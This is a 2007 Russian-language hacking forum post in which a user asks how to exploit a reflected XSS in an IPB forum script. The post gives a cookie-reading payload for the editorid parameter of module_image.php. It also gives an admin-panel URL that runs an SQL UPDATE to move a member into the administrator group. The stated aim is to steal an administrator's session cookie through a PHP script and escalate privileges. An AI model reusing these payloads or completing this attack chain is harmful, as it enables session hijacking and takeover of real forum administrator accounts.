Нужна помощь с хсс

Discussion in 'Песочница' started by FaR-G9, 21 Aug 2007.

  1. FaR-G9

    FaR-G9 Member

    Joined:
    19 Dec 2006
    Messages:
    114
    Likes Received:
    28
    Reputations:
    -4
    У меня такой вот вопрос
    на форуме IPB есть пасивная хсс
    Code:
    http://localhost/ipb/jscripts/folder_rte_files/module_image.php?editorid=";alert(document.cookie);var i="
    Какаим образом можно использовать эту уязвимость, чтоб задействовать куки в php скрипте
    В общем я хочу скриптом сгенерировать такую ссылку

    Code:
    http://localhost/ipb/admin/index.php?adsess=сесия&act=sql&code=runsql&section=admin&query=UPDATE+ibf_members+SET+mgroup+%3D+%274%27+WHERE+id+%3D+%272%27&st="
     
    #1 FaR-G9, 21 Aug 2007
    Last edited: 22 Aug 2007
(You must log in or sign up to post here.)